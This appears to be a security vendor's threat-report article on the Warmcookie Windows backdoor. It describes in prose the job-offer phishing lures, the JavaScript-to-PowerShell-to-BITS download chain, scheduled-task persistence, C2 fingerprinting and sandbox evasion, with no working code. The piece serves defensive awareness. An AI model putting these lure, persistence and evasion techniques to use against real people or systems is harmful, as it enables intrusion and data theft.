HQ/EMEAFind out how we can help your business
The previously unknown Windows malware called Warmcookie is currently spreading through a phishing campaign that capitalises on phoney job offers. Based on reports, this malware could execute machine fingerprinting, screenshot capture, and payload distribution.
Researchers noted that the phishing campaign uses fraudulent employment and recruitment offers sent via email with attractive subject lines. The malware operators allegedly personalise their targeting by using the victims’ names and those of their existing employers.
The emails include a link that claims to be for an internal recruitment portal where a target can view the job description. However, it redirects the visitor to landing pages that resemble authentic platforms.
Moreover, these bogus pages need the user to complete a CAPTCHA before downloading an obfuscated JavaScript file with a name similar to ‘Update_23_04_2024_5689382’ to add a sense of validity.
Once executed, the JS script retrieves a PowerShell script that leverages the Background Intelligent Transfer Service (BITS) to download the Warmcookie DLL file from a URL and execute it with rundll32.exe. Subsequently, the attack process will copy the Warmcookie payload to C: ProgramDataRtlUpdRtlUpd.dll and the first execution generates a scheduled task called ‘RtlUpd’ that runs every 10 minutes.
Also, the Warmcookie malware connects to the attacker-controlled C2 server during the final setup step and begins fingerprinting the victim’s system.
The Warmcookie malware has various capabilities that could cause severe compromise to an infected target.
Warmcookie is a backdoor malware that uses multiple features to enter, persist, and gather intelligence from victim systems.
The first action stage captures critical information about the infected host, such as the volume serial number, DNS domain, machine name, and username, before encrypting and sending the data to the C2 via the HTTP cookie parameter.
Furthermore, the malware reviews all received commands using CRC32 checksums to ensure that no tampering occurs. In addition, Warmcookie will not run if the number of CPU processors and physical/virtual memory values fall below predefined thresholds to avoid security analysis.
Despite being a new malicious payload, Warmcookie is already fully capable of inflicting severe damage on its targets, especially given its capacity to inject additional payloads. Therefore, security providers and organisations should be wary of this threat, as it shows signs of being formidable malware.
